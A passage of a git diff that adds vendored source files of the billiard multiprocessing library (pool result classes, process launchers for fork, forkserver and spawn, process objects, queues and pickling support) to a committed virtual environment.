self._value) + + def _ack(self, i, time_accepted, pid, synqW_fd): + with self._mutex: + if self._cancelled and self._send_ack: + self._accepted = True + if synqW_fd: + return self._send_ack(NACK, pid, self._job, synqW_fd) + return + self._accepted = True + self._time_accepted = time_accepted + self._worker_pid = pid + if self.ready(): + # ack received after set() + self._cache.pop(self._job, None) + if self._on_timeout_set: + self._on_timeout_set(self, self._soft_timeout, self._timeout) + response = ACK + if self._accept_callback: + try: + self._accept_callback(pid, time_accepted) + except self._propagate_errors: + response = NACK + raise + except Exception: + response = NACK + # ignore other errors + finally: + if self._send_ack and synqW_fd: + return self._send_ack( + response, pid, self._job, synqW_fd + ) + if self._send_ack and synqW_fd: + self._send_ack(response, pid, self._job, synqW_fd) + +# +# Class whose instances are returned by `Pool.map_async()` +# + + +class MapResult(ApplyResult): + + def __init__(self, cache, chunksize, length, callback, error_callback): + ApplyResult.__init__( + self, cache, callback, error_callback=error_callback, + ) + self._success = True + self._length = length + self._value = [None] * length + self._accepted = [False] * length + self._worker_pid = [None] * length + self._time_accepted = [None] * length + self._chunksize = chunksize + if chunksize <= 0: + self._number_left = 0 + self._event.set() + del cache[self._job] + else: + self._number_left = length // chunksize + bool(length % chunksize) + + def _set(self, i, success_result): + success, result = success_result + if success: + self._value[i * self._chunksize:(i + 1) * self._chunksize] = result + self._number_left -= 1 + if self._number_left == 0: + if self._callback: + self._callback(self._value) + if self._accepted: + self._cache.pop(self._job, None) + 
self._event.set() + else: + self._success = False + self._value = result + if self._error_callback: + self._error_callback(self._value) + if self._accepted: + self._cache.pop(self._job, None) + self._event.set() + + def _ack(self, i, time_accepted, pid, *args): + start = i * self._chunksize + stop = min((i + 1) * self._chunksize, self._length) + for j in range(start, stop): + self._accepted[j] = True + self._worker_pid[j] = pid + self._time_accepted[j] = time_accepted + if self.ready(): + self._cache.pop(self._job, None) + + def accepted(self): + return all(self._accepted) + + def worker_pids(self): + return [pid for pid in self._worker_pid if pid] + +# +# Class whose instances are returned by `Pool.imap()` +# + + +class IMapIterator: + _worker_lost = None + + def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT): + self._cond = threading.Condition(threading.Lock()) + self._job = next(job_counter) + self._cache = cache + self._items = deque() + self._index = 0 + self._length = None + self._ready = False + self._unsorted = {} + self._worker_pids = [] + self._lost_worker_timeout = lost_worker_timeout + cache[self._job] = self + + def __iter__(self): + return self + + def next(self, timeout=None): + with self._cond: + try: + item = self._items.popleft() + except IndexError: + if self._index == self._length: + self._ready = True + raise StopIteration + self._cond.wait(timeout) + try: + item = self._items.popleft() + except IndexError: + if self._index == self._length: + self._ready = True + raise StopIteration + raise TimeoutError + + success, value = item + if success: + return value + raise Exception(value) + + __next__ = next # XXX + + def _set(self, i, obj): + with self._cond: + if self._index == i: + self._items.append(obj) + self._index += 1 + while self._index in self._unsorted: + obj = self._unsorted.pop(self._index) + self._items.append(obj) + self._index += 1 + self._cond.notify() + else: + self._unsorted[i] = obj + + if self._index == self._length: + self._ready = True + del self._cache[self._job] + + def _set_length(self, length): + with self._cond: + self._length = length + if self._index == self._length: + self._ready = True + self._cond.notify() + del self._cache[self._job] + + def _ack(self, i, time_accepted, pid, *args): + self._worker_pids.append(pid) + + def ready(self): + return self._ready + + def worker_pids(self): + return self._worker_pids + +# +# Class whose instances are returned by `Pool.imap_unordered()` +# + + +class IMapUnorderedIterator(IMapIterator): + + def _set(self, i, obj): + with self._cond: + self._items.append(obj) + self._index += 1 + self._cond.notify() + if self._index == self._length: + self._ready = True + del self._cache[self._job] + +# +# +# + + +class ThreadPool(Pool): + + from .dummy import Process as DummyProcess + Process = DummyProcess + + def __init__(self, processes=None, initializer=None, initargs=()): + Pool.__init__(self, processes, initializer, initargs) + + def _setup_queues(self): + self._inqueue = Queue() + self._outqueue = Queue() + self._quick_put = self._inqueue.put + self._quick_get = self._outqueue.get + + def _poll_result(timeout): + try: + return True, self._quick_get(timeout=timeout) + except Empty: + return False, None + self._poll_result = _poll_result + + @staticmethod + def _help_stuff_finish(inqueue, task_handler, pool): + # put sentinels at head of inqueue to make workers finish + with inqueue.not_empty: + inqueue.queue.clear() + inqueue.queue.extend([None] * len(pool)) + inqueue.not_empty.notify_all() diff 
--git a/env/Lib/site-packages/billiard/popen_fork.py b/env/Lib/site-packages/billiard/popen_fork.py new file mode 100644 index 00000000..caf14f8e --- /dev/null +++ b/env/Lib/site-packages/billiard/popen_fork.py @@ -0,0 +1,89 @@ +import os +import sys +import errno + +from .common import TERM_SIGNAL + +__all__ = ['Popen'] + +# +# Start child process using fork +# + + +class Popen: + method = 'fork' + sentinel = None + + def __init__(self, process_obj): + sys.stdout.flush() + sys.stderr.flush() + self.returncode = None + self._launch(process_obj) + + def duplicate_for_child(self, fd): + return fd + + def poll(self, flag=os.WNOHANG): + if self.returncode is None: + while True: + try: + pid, sts = os.waitpid(self.pid, flag) + except OSError as e: + if e.errno == errno.EINTR: + continue + # Child process not yet created. See #1731717 + # e.errno == errno.ECHILD == 10 + return None + else: + break + if pid == self.pid: + if os.WIFSIGNALED(sts): + self.returncode = -os.WTERMSIG(sts) + else: + assert os.WIFEXITED(sts) + self.returncode = os.WEXITSTATUS(sts) + return self.returncode + + def wait(self, timeout=None): + if self.returncode is None: + if timeout is not None: + from .connection import wait + if not wait([self.sentinel], timeout): + return None + # This shouldn't block if wait() returned successfully. + return self.poll(os.WNOHANG if timeout == 0.0 else 0) + return self.returncode + + def terminate(self): + if self.returncode is None: + try: + os.kill(self.pid, TERM_SIGNAL) + except OSError as exc: + if getattr(exc, 'errno', None) != errno.ESRCH: + if self.wait(timeout=0.1) is None: + raise + + def _launch(self, process_obj): + code = 1 + parent_r, child_w = os.pipe() + self.pid = os.fork() + if self.pid == 0: + try: + os.close(parent_r) + if 'random' in sys.modules: + import random + random.seed() + code = process_obj._bootstrap() + finally: + os._exit(code) + else: + os.close(child_w) + self.sentinel = parent_r + + def close(self): + if self.sentinel is not None: + try: + os.close(self.sentinel) + finally: + self.sentinel = None diff --git a/env/Lib/site-packages/billiard/popen_forkserver.py b/env/Lib/site-packages/billiard/popen_forkserver.py new file mode 100644 index 00000000..dfff2540 --- /dev/null +++ b/env/Lib/site-packages/billiard/popen_forkserver.py @@ -0,0 +1,68 @@ +import io +import os + +from . import reduction +from . import context +from . import forkserver +from . import popen_fork +from . 
import spawn + +__all__ = ['Popen'] + +# +# Wrapper for an fd used while launching a process +# + + +class _DupFd: + + def __init__(self, ind): + self.ind = ind + + def detach(self): + return forkserver.get_inherited_fds()[self.ind] + +# +# Start child process using a server process +# + + +class Popen(popen_fork.Popen): + method = 'forkserver' + DupFd = _DupFd + + def __init__(self, process_obj): + self._fds = [] + super().__init__(process_obj) + + def duplicate_for_child(self, fd): + self._fds.append(fd) + return len(self._fds) - 1 + + def _launch(self, process_obj): + prep_data = spawn.get_preparation_data(process_obj._name) + buf = io.BytesIO() + context.set_spawning_popen(self) + try: + reduction.dump(prep_data, buf) + reduction.dump(process_obj, buf) + finally: + context.set_spawning_popen(None) + + self.sentinel, w = forkserver.connect_to_new_process(self._fds) + with io.open(w, 'wb', closefd=True) as f: + f.write(buf.getbuffer()) + self.pid = forkserver.read_unsigned(self.sentinel) + + def poll(self, flag=os.WNOHANG): + if self.returncode is None: + from .connection import wait + timeout = 0 if flag == os.WNOHANG else None + if not wait([self.sentinel], timeout): + return None + try: + self.returncode = forkserver.read_unsigned(self.sentinel) + except (OSError, EOFError): + # The process ended abnormally perhaps because of a signal + self.returncode = 255 + return self.returncode diff --git a/env/Lib/site-packages/billiard/popen_spawn_posix.py b/env/Lib/site-packages/billiard/popen_spawn_posix.py new file mode 100644 index 00000000..5772a755 --- /dev/null +++ b/env/Lib/site-packages/billiard/popen_spawn_posix.py @@ -0,0 +1,74 @@ +import io +import os + +from . import context +from . import popen_fork +from . import reduction +from . import spawn + +from .compat import spawnv_passfds + +__all__ = ['Popen'] + + +# +# Wrapper for an fd used while launching a process +# + +class _DupFd: + + def __init__(self, fd): + self.fd = fd + + def detach(self): + return self.fd + +# +# Start child process using a fresh interpreter +# + + +class Popen(popen_fork.Popen): + method = 'spawn' + DupFd = _DupFd + + def __init__(self, process_obj): + self._fds = [] + super().__init__(process_obj) + + def duplicate_for_child(self, fd): + self._fds.append(fd) + return fd + + def _launch(self, process_obj): + os.environ["MULTIPROCESSING_FORKING_DISABLE"] = "1" + spawn._Django_old_layout_hack__save() + from . 
import semaphore_tracker + tracker_fd = semaphore_tracker.getfd() + self._fds.append(tracker_fd) + prep_data = spawn.get_preparation_data(process_obj._name) + fp = io.BytesIO() + context.set_spawning_popen(self) + try: + reduction.dump(prep_data, fp) + reduction.dump(process_obj, fp) + finally: + context.set_spawning_popen(None) + + parent_r = child_w = child_r = parent_w = None + try: + parent_r, child_w = os.pipe() + child_r, parent_w = os.pipe() + cmd = spawn.get_command_line(tracker_fd=tracker_fd, + pipe_handle=child_r) + self._fds.extend([child_r, child_w]) + self.pid = spawnv_passfds( + spawn.get_executable(), cmd, self._fds, + ) + self.sentinel = parent_r + with io.open(parent_w, 'wb', closefd=False) as f: + f.write(fp.getvalue()) + finally: + for fd in (child_r, child_w, parent_w): + if fd is not None: + os.close(fd) diff --git a/env/Lib/site-packages/billiard/popen_spawn_win32.py b/env/Lib/site-packages/billiard/popen_spawn_win32.py new file mode 100644 index 00000000..23254923 --- /dev/null +++ b/env/Lib/site-packages/billiard/popen_spawn_win32.py @@ -0,0 +1,121 @@ +import io +import os +import msvcrt +import signal +import sys + +from . import context +from . import spawn +from . import reduction + +from .compat import _winapi + +__all__ = ['Popen'] + +# +# +# + +TERMINATE = 0x10000 +WINEXE = (sys.platform == 'win32' and getattr(sys, 'frozen', False)) +WINSERVICE = sys.executable.lower().endswith("pythonservice.exe") + +# +# We define a Popen class similar to the one from subprocess, but +# whose constructor takes a process object as its argument. +# + + +if sys.platform == 'win32': + try: + from _winapi import CreateProcess, GetExitCodeProcess + close_thread_handle = _winapi.CloseHandle + except ImportError: # Py2.7 + from _subprocess import CreateProcess, GetExitCodeProcess + + def close_thread_handle(handle): + handle.Close() + + +class Popen: + ''' + Start a subprocess to run the code of a process object + ''' + method = 'spawn' + sentinel = None + + def __init__(self, process_obj): + os.environ["MULTIPROCESSING_FORKING_DISABLE"] = "1" + spawn._Django_old_layout_hack__save() + prep_data = spawn.get_preparation_data(process_obj._name) + + # read end of pipe will be "stolen" by the child process + # -- see spawn_main() in spawn.py. 
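+        # A rough sketch of the handshake that follows: the parent keeps
+        # the write end (whandle/wfd) and pickles prep_data followed by
+        # process_obj into it, while the child is handed rhandle on its
+        # command line (pipe_handle=...) and unpickles both objects from
+        # that end in spawn_main().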
+ rhandle, whandle = _winapi.CreatePipe(None, 0) + wfd = msvcrt.open_osfhandle(whandle, 0) + cmd = spawn.get_command_line(parent_pid=os.getpid(), + pipe_handle=rhandle) + cmd = ' '.join('"%s"' % x for x in cmd) + + with io.open(wfd, 'wb', closefd=True) as to_child: + # start process + try: + hp, ht, pid, tid = CreateProcess( + spawn.get_executable(), cmd, + None, None, False, 0, None, None, None) + close_thread_handle(ht) + except: + _winapi.CloseHandle(rhandle) + raise + + # set attributes of self + self.pid = pid + self.returncode = None + self._handle = hp + self.sentinel = int(hp) + + # send information to child + context.set_spawning_popen(self) + try: + reduction.dump(prep_data, to_child) + reduction.dump(process_obj, to_child) + finally: + context.set_spawning_popen(None) + + def close(self): + if self.sentinel is not None: + try: + _winapi.CloseHandle(self.sentinel) + finally: + self.sentinel = None + + def duplicate_for_child(self, handle): + assert self is context.get_spawning_popen() + return reduction.duplicate(handle, self.sentinel) + + def wait(self, timeout=None): + if self.returncode is None: + if timeout is None: + msecs = _winapi.INFINITE + else: + msecs = max(0, int(timeout * 1000 + 0.5)) + + res = _winapi.WaitForSingleObject(int(self._handle), msecs) + if res == _winapi.WAIT_OBJECT_0: + code = GetExitCodeProcess(self._handle) + if code == TERMINATE: + code = -signal.SIGTERM + self.returncode = code + + return self.returncode + + def poll(self): + return self.wait(timeout=0) + + def terminate(self): + if self.returncode is None: + try: + _winapi.TerminateProcess(int(self._handle), TERMINATE) + except OSError: + if self.wait(timeout=1.0) is None: + raise diff --git a/env/Lib/site-packages/billiard/process.py b/env/Lib/site-packages/billiard/process.py new file mode 100644 index 00000000..3f1c87c7 --- /dev/null +++ b/env/Lib/site-packages/billiard/process.py @@ -0,0 +1,400 @@ +# +# Module providing the `Process` class which emulates `threading.Thread` +# +# multiprocessing/process.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. 
+# +# +# Imports +# + +import os +import sys +import signal +import itertools +import logging +import threading +from _weakrefset import WeakSet + +from multiprocessing import process as _mproc + +try: + ORIGINAL_DIR = os.path.abspath(os.getcwd()) +except OSError: + ORIGINAL_DIR = None + +__all__ = ['BaseProcess', 'Process', 'current_process', 'active_children'] + +# +# Public functions +# + + +def current_process(): + ''' + Return process object representing the current process + ''' + return _current_process + + +def _set_current_process(process): + global _current_process + _current_process = _mproc._current_process = process + + +def _cleanup(): + # check for processes which have finished + for p in list(_children): + if p._popen.poll() is not None: + _children.discard(p) + + +def _maybe_flush(f): + try: + f.flush() + except (AttributeError, EnvironmentError, NotImplementedError): + pass + + +def active_children(_cleanup=_cleanup): + ''' + Return list of process objects corresponding to live child processes + ''' + try: + _cleanup() + except TypeError: + # called after gc collect so _cleanup does not exist anymore + return [] + return list(_children) + + +class BaseProcess: + ''' + Process objects represent activity that is run in a separate process + + The class is analogous to `threading.Thread` + ''' + + def _Popen(self): + raise NotImplementedError() + + def __init__(self, group=None, target=None, name=None, + args=(), kwargs={}, daemon=None, **_kw): + assert group is None, 'group argument must be None for now' + count = next(_process_counter) + self._identity = _current_process._identity + (count, ) + self._config = _current_process._config.copy() + self._parent_pid = os.getpid() + self._popen = None + self._target = target + self._args = tuple(args) + self._kwargs = dict(kwargs) + self._name = ( + name or type(self).__name__ + '-' + + ':'.join(str(i) for i in self._identity) + ) + if daemon is not None: + self.daemon = daemon + if _dangling is not None: + _dangling.add(self) + + self._controlled_termination = False + + def run(self): + ''' + Method to be run in sub-process; can be overridden in sub-class + ''' + if self._target: + self._target(*self._args, **self._kwargs) + + def start(self): + ''' + Start child process + ''' + assert self._popen is None, 'cannot start a process twice' + assert self._parent_pid == os.getpid(), \ + 'can only start a process object created by current process' + _cleanup() + self._popen = self._Popen(self) + self._sentinel = self._popen.sentinel + _children.add(self) + + def close(self): + if self._popen is not None: + self._popen.close() + + def terminate(self): + ''' + Terminate process; sends SIGTERM signal or uses TerminateProcess() + ''' + self._popen.terminate() + + def terminate_controlled(self): + self._controlled_termination = True + self.terminate() + + def join(self, timeout=None): + ''' + Wait until child process terminates + ''' + assert self._parent_pid == os.getpid(), 'can only join a child process' + assert self._popen is not None, 'can only join a started process' + res = self._popen.wait(timeout) + if res is not None: + _children.discard(self) + self.close() + + def is_alive(self): + ''' + Return whether process is alive + ''' + if self is _current_process: + return True + assert self._parent_pid == os.getpid(), 'can only test a child process' + if self._popen is None: + return False + self._popen.poll() + return self._popen.returncode is None + + def _is_alive(self): + if self._popen is None: + return False + return 
self._popen.poll() is None + + @property + def name(self): + return self._name + + @name.setter + def name(self, name): # noqa + assert isinstance(name, str), 'name must be a string' + self._name = name + + @property + def daemon(self): + ''' + Return whether process is a daemon + ''' + return self._config.get('daemon', False) + + @daemon.setter # noqa + def daemon(self, daemonic): + ''' + Set whether process is a daemon + ''' + assert self._popen is None, 'process has already started' + self._config['daemon'] = daemonic + + @property + def authkey(self): + return self._config['authkey'] + + @authkey.setter # noqa + def authkey(self, authkey): + ''' + Set authorization key of process + ''' + self._config['authkey'] = AuthenticationString(authkey) + + @property + def exitcode(self): + ''' + Return exit code of process or `None` if it has yet to stop + ''' + if self._popen is None: + return self._popen + return self._popen.poll() + + @property + def ident(self): + ''' + Return identifier (PID) of process or `None` if it has yet to start + ''' + if self is _current_process: + return os.getpid() + else: + return self._popen and self._popen.pid + + pid = ident + + @property + def sentinel(self): + ''' + Return a file descriptor (Unix) or handle (Windows) suitable for + waiting for process termination. + ''' + try: + return self._sentinel + except AttributeError: + raise ValueError("process not started") + + @property + def _counter(self): + # compat for 2.7 + return _process_counter + + @property + def _children(self): + # compat for 2.7 + return _children + + @property + def _authkey(self): + # compat for 2.7 + return self.authkey + + @property + def _daemonic(self): + # compat for 2.7 + return self.daemon + + @property + def _tempdir(self): + # compat for 2.7 + return self._config.get('tempdir') + + def __repr__(self): + if self is _current_process: + status = 'started' + elif self._parent_pid != os.getpid(): + status = 'unknown' + elif self._popen is None: + status = 'initial' + else: + if self._popen.poll() is not None: + status = self.exitcode + else: + status = 'started' + + if type(status) is int: + if status == 0: + status = 'stopped' + else: + status = 'stopped[%s]' % _exitcode_to_name.get(status, status) + + return '<%s(%s, %s%s)>' % (type(self).__name__, self._name, + status, self.daemon and ' daemon' or '') + + ## + + def _bootstrap(self): + from . import util, context + global _current_process, _process_counter, _children + + try: + if self._start_method is not None: + context._force_start_method(self._start_method) + _process_counter = itertools.count(1) + _children = set() + if sys.stdin is not None: + try: + sys.stdin.close() + sys.stdin = open(os.devnull) + except (EnvironmentError, OSError, ValueError): + pass + old_process = _current_process + _set_current_process(self) + + # Re-init logging system. + # Workaround for https://bugs.python.org/issue6721/#msg140215 + # Python logging module uses RLock() objects which are broken + # after fork. This can result in a deadlock (Celery Issue #496). 
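+            # In sketch, the workaround below walks every known logger,
+            # asks each attached handler to recreate its lock via
+            # createLock(), and swaps in a fresh logging._lock, so the
+            # child never waits on a lock still "held" by a parent thread
+            # that no longer exists after the fork.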
+ loggerDict = logging.Logger.manager.loggerDict + logger_names = list(loggerDict.keys()) + logger_names.append(None) # for root logger + for name in logger_names: + if not name or not isinstance(loggerDict[name], + logging.PlaceHolder): + for handler in logging.getLogger(name).handlers: + handler.createLock() + logging._lock = threading.RLock() + + try: + util._finalizer_registry.clear() + util._run_after_forkers() + finally: + # delay finalization of the old process object until after + # _run_after_forkers() is executed + del old_process + util.info('child process %s calling self.run()', self.pid) + try: + self.run() + exitcode = 0 + finally: + util._exit_function() + except SystemExit as exc: + if not exc.args: + exitcode = 1 + elif isinstance(exc.args[0], int): + exitcode = exc.args[0] + else: + sys.stderr.write(str(exc.args[0]) + '\n') + _maybe_flush(sys.stderr) + exitcode = 0 if isinstance(exc.args[0], str) else 1 + except: + exitcode = 1 + if not util.error('Process %s', self.name, exc_info=True): + import traceback + sys.stderr.write('Process %s:\n' % self.name) + traceback.print_exc() + finally: + util.info('process %s exiting with exitcode %d', + self.pid, exitcode) + _maybe_flush(sys.stdout) + _maybe_flush(sys.stderr) + + return exitcode + +# +# We subclass bytes to avoid accidental transmission of auth keys over network +# + + +class AuthenticationString(bytes): + + def __reduce__(self): + from .context import get_spawning_popen + + if get_spawning_popen() is None: + raise TypeError( + 'Pickling an AuthenticationString object is ' + 'disallowed for security reasons') + return AuthenticationString, (bytes(self),) + +# +# Create object representing the main process +# + + +class _MainProcess(BaseProcess): + + def __init__(self): + self._identity = () + self._name = 'MainProcess' + self._parent_pid = None + self._popen = None + self._config = {'authkey': AuthenticationString(os.urandom(32)), + 'semprefix': '/mp'} + +_current_process = _MainProcess() +_process_counter = itertools.count(1) +_children = set() +del _MainProcess + + +Process = BaseProcess + +# +# Give names to some return codes +# + +_exitcode_to_name = {} + +for name, signum in signal.__dict__.items(): + if name[:3] == 'SIG' and '_' not in name: + _exitcode_to_name[-signum] = name + +# For debug and leak testing +_dangling = WeakSet() diff --git a/env/Lib/site-packages/billiard/queues.py b/env/Lib/site-packages/billiard/queues.py new file mode 100644 index 00000000..bd16f8c3 --- /dev/null +++ b/env/Lib/site-packages/billiard/queues.py @@ -0,0 +1,403 @@ +# +# Module implementing queues +# +# multiprocessing/queues.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import sys +import os +import threading +import collections +import weakref +import errno + +from . import connection +from . 
import context + +from .compat import get_errno +from time import monotonic +from queue import Empty, Full +from .util import ( + debug, error, info, Finalize, register_after_fork, is_exiting, +) +from .reduction import ForkingPickler + +__all__ = ['Queue', 'SimpleQueue', 'JoinableQueue'] + + +class Queue: + ''' + Queue type using a pipe, buffer and thread + ''' + def __init__(self, maxsize=0, *args, **kwargs): + try: + ctx = kwargs['ctx'] + except KeyError: + raise TypeError('missing 1 required keyword-only argument: ctx') + if maxsize <= 0: + # Can raise ImportError (see issues #3770 and #23400) + from .synchronize import SEM_VALUE_MAX as maxsize # noqa + self._maxsize = maxsize + self._reader, self._writer = connection.Pipe(duplex=False) + self._rlock = ctx.Lock() + self._opid = os.getpid() + if sys.platform == 'win32': + self._wlock = None + else: + self._wlock = ctx.Lock() + self._sem = ctx.BoundedSemaphore(maxsize) + # For use by concurrent.futures + self._ignore_epipe = False + + self._after_fork() + + if sys.platform != 'win32': + register_after_fork(self, Queue._after_fork) + + def __getstate__(self): + context.assert_spawning(self) + return (self._ignore_epipe, self._maxsize, self._reader, self._writer, + self._rlock, self._wlock, self._sem, self._opid) + + def __setstate__(self, state): + (self._ignore_epipe, self._maxsize, self._reader, self._writer, + self._rlock, self._wlock, self._sem, self._opid) = state + self._after_fork() + + def _after_fork(self): + debug('Queue._after_fork()') + self._notempty = threading.Condition(threading.Lock()) + self._buffer = collections.deque() + self._thread = None + self._jointhread = None + self._joincancelled = False + self._closed = False + self._close = None + self._send_bytes = self._writer.send + self._recv = self._reader.recv + self._send_bytes = self._writer.send_bytes + self._recv_bytes = self._reader.recv_bytes + self._poll = self._reader.poll + + def put(self, obj, block=True, timeout=None): + assert not self._closed + if not self._sem.acquire(block, timeout): + raise Full + + with self._notempty: + if self._thread is None: + self._start_thread() + self._buffer.append(obj) + self._notempty.notify() + + def get(self, block=True, timeout=None): + if block and timeout is None: + with self._rlock: + res = self._recv_bytes() + self._sem.release() + + else: + if block: + deadline = monotonic() + timeout + if not self._rlock.acquire(block, timeout): + raise Empty + try: + if block: + timeout = deadline - monotonic() + if timeout < 0 or not self._poll(timeout): + raise Empty + elif not self._poll(): + raise Empty + res = self._recv_bytes() + self._sem.release() + finally: + self._rlock.release() + # unserialize the data after having released the lock + return ForkingPickler.loads(res) + + def qsize(self): + # Raises NotImplementedError on macOS because + # of broken sem_getvalue() + return self._maxsize - self._sem._semlock._get_value() + + def empty(self): + return not self._poll() + + def full(self): + return self._sem._semlock._is_zero() + + def get_nowait(self): + return self.get(False) + + def put_nowait(self, obj): + return self.put(obj, False) + + def close(self): + self._closed = True + try: + self._reader.close() + finally: + close = self._close + if close: + self._close = None + close() + + def join_thread(self): + debug('Queue.join_thread()') + assert self._closed + if self._jointhread: + self._jointhread() + + def cancel_join_thread(self): + debug('Queue.cancel_join_thread()') + self._joincancelled = True + try: + 
self._jointhread.cancel() + except AttributeError: + pass + + def _start_thread(self): + debug('Queue._start_thread()') + + # Start thread which transfers data from buffer to pipe + self._buffer.clear() + self._thread = threading.Thread( + target=Queue._feed, + args=(self._buffer, self._notempty, self._send_bytes, + self._wlock, self._writer.close, self._ignore_epipe), + name='QueueFeederThread' + ) + self._thread.daemon = True + + debug('doing self._thread.start()') + self._thread.start() + debug('... done self._thread.start()') + + # On process exit we will wait for data to be flushed to pipe. + # + # However, if this process created the queue then all + # processes which use the queue will be descendants of this + # process. Therefore waiting for the queue to be flushed + # is pointless once all the child processes have been joined. + created_by_this_process = (self._opid == os.getpid()) + if not self._joincancelled and not created_by_this_process: + self._jointhread = Finalize( + self._thread, Queue._finalize_join, + [weakref.ref(self._thread)], + exitpriority=-5 + ) + + # Send sentinel to the thread queue object when garbage collected + self._close = Finalize( + self, Queue._finalize_close, + [self._buffer, self._notempty], + exitpriority=10 + ) + + @staticmethod + def _finalize_join(twr): + debug('joining queue thread') + thread = twr() + if thread is not None: + thread.join() + debug('... queue thread joined') + else: + debug('... queue thread already dead') + + @staticmethod + def _finalize_close(buffer, notempty): + debug('telling queue thread to quit') + with notempty: + buffer.append(_sentinel) + notempty.notify() + + @staticmethod + def _feed(buffer, notempty, send_bytes, writelock, close, ignore_epipe): + debug('starting thread to feed data to pipe') + + nacquire = notempty.acquire + nrelease = notempty.release + nwait = notempty.wait + bpopleft = buffer.popleft + sentinel = _sentinel + if sys.platform != 'win32': + wacquire = writelock.acquire + wrelease = writelock.release + else: + wacquire = None + + try: + while 1: + nacquire() + try: + if not buffer: + nwait() + finally: + nrelease() + try: + while 1: + obj = bpopleft() + if obj is sentinel: + debug('feeder thread got sentinel -- exiting') + close() + return + + # serialize the data before acquiring the lock + obj = ForkingPickler.dumps(obj) + if wacquire is None: + send_bytes(obj) + else: + wacquire() + try: + send_bytes(obj) + finally: + wrelease() + except IndexError: + pass + except Exception as exc: + if ignore_epipe and get_errno(exc) == errno.EPIPE: + return + # Since this runs in a daemon thread the resources it uses + # may be become unusable while the process is cleaning up. + # We ignore errors which happen after the process has + # started to cleanup. + try: + if is_exiting(): + info('error in queue thread: %r', exc, exc_info=True) + else: + if not error('error in queue thread: %r', exc, + exc_info=True): + import traceback + traceback.print_exc() + except Exception: + pass + +_sentinel = object() + + +class JoinableQueue(Queue): + ''' + A queue type which also supports join() and task_done() methods + + Note that if you do not call task_done() for each finished task then + eventually the counter's semaphore may overflow causing Bad Things + to happen. 
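+
+    A minimal usage sketch (single process, purely illustrative; the
+    queue is created through a context so that the required ``ctx``
+    argument is supplied for us):
+
+        >>> from billiard import get_context
+        >>> q = get_context().JoinableQueue()
+        >>> q.put('work')
+        >>> q.get()
+        'work'
+        >>> q.task_done()
+        >>> q.join()   # returns at once: every task has been marked done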
+ ''' + + def __init__(self, maxsize=0, *args, **kwargs): + try: + ctx = kwargs['ctx'] + except KeyError: + raise TypeError('missing 1 required keyword argument: ctx') + Queue.__init__(self, maxsize, ctx=ctx) + self._unfinished_tasks = ctx.Semaphore(0) + self._cond = ctx.Condition() + + def __getstate__(self): + return Queue.__getstate__(self) + (self._cond, self._unfinished_tasks) + + def __setstate__(self, state): + Queue.__setstate__(self, state[:-2]) + self._cond, self._unfinished_tasks = state[-2:] + + def put(self, obj, block=True, timeout=None): + assert not self._closed + if not self._sem.acquire(block, timeout): + raise Full + + with self._notempty: + with self._cond: + if self._thread is None: + self._start_thread() + self._buffer.append(obj) + self._unfinished_tasks.release() + self._notempty.notify() + + def task_done(self): + with self._cond: + if not self._unfinished_tasks.acquire(False): + raise ValueError('task_done() called too many times') + if self._unfinished_tasks._semlock._is_zero(): + self._cond.notify_all() + + def join(self): + with self._cond: + if not self._unfinished_tasks._semlock._is_zero(): + self._cond.wait() + + +class _SimpleQueue: + ''' + Simplified Queue type -- really just a locked pipe + ''' + + def __init__(self, rnonblock=False, wnonblock=False, ctx=None): + self._reader, self._writer = connection.Pipe( + duplex=False, rnonblock=rnonblock, wnonblock=wnonblock, + ) + self._poll = self._reader.poll + self._rlock = self._wlock = None + + def empty(self): + return not self._poll() + + def __getstate__(self): + context.assert_spawning(self) + return (self._reader, self._writer, self._rlock, self._wlock) + + def __setstate__(self, state): + (self._reader, self._writer, self._rlock, self._wlock) = state + + def get_payload(self): + return self._reader.recv_bytes() + + def send_payload(self, value): + self._writer.send_bytes(value) + + def get(self): + # unserialize the data after having released the lock + return ForkingPickler.loads(self.get_payload()) + + def put(self, obj): + # serialize the data before acquiring the lock + self.send_payload(ForkingPickler.dumps(obj)) + + def close(self): + if self._reader is not None: + try: + self._reader.close() + finally: + self._reader = None + + if self._writer is not None: + try: + self._writer.close() + finally: + self._writer = None + + +class SimpleQueue(_SimpleQueue): + + def __init__(self, *args, **kwargs): + try: + ctx = kwargs['ctx'] + except KeyError: + raise TypeError('missing required keyword argument: ctx') + self._reader, self._writer = connection.Pipe(duplex=False) + self._rlock = ctx.Lock() + self._wlock = ctx.Lock() if sys.platform != 'win32' else None + + def get_payload(self): + with self._rlock: + return self._reader.recv_bytes() + + def send_payload(self, value): + if self._wlock is None: + # writes to a message oriented win32 pipe are atomic + self._writer.send_bytes(value) + else: + with self._wlock: + self._writer.send_bytes(value) diff --git a/env/Lib/site-packages/billiard/reduction.py b/env/Lib/site-packages/billiard/reduction.py new file mode 100644 index 00000000..1677ffc9 --- /dev/null +++ b/env/Lib/site-packages/billiard/reduction.py @@ -0,0 +1,293 @@ +# +# Module which deals with pickling of objects. +# +# multiprocessing/reduction.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import functools +import io +import os +import pickle +import socket +import sys + +from . 
import context + +__all__ = ['send_handle', 'recv_handle', 'ForkingPickler', 'register', 'dump'] + +PY3 = sys.version_info[0] == 3 + + +HAVE_SEND_HANDLE = (sys.platform == 'win32' or + (hasattr(socket, 'CMSG_LEN') and + hasattr(socket, 'SCM_RIGHTS') and + hasattr(socket.socket, 'sendmsg'))) + +# +# Pickler subclass +# + + +if PY3: + import copyreg + + class ForkingPickler(pickle.Pickler): + '''Pickler subclass used by multiprocessing.''' + _extra_reducers = {} + _copyreg_dispatch_table = copyreg.dispatch_table + + def __init__(self, *args): + super(ForkingPickler, self).__init__(*args) + self.dispatch_table = self._copyreg_dispatch_table.copy() + self.dispatch_table.update(self._extra_reducers) + + @classmethod + def register(cls, type, reduce): + '''Register a reduce function for a type.''' + cls._extra_reducers[type] = reduce + + @classmethod + def dumps(cls, obj, protocol=None): + buf = io.BytesIO() + cls(buf, protocol).dump(obj) + return buf.getbuffer() + + @classmethod + def loadbuf(cls, buf, protocol=None): + return cls.loads(buf.getbuffer()) + + loads = pickle.loads + +else: + + class ForkingPickler(pickle.Pickler): # noqa + '''Pickler subclass used by multiprocessing.''' + dispatch = pickle.Pickler.dispatch.copy() + + @classmethod + def register(cls, type, reduce): + '''Register a reduce function for a 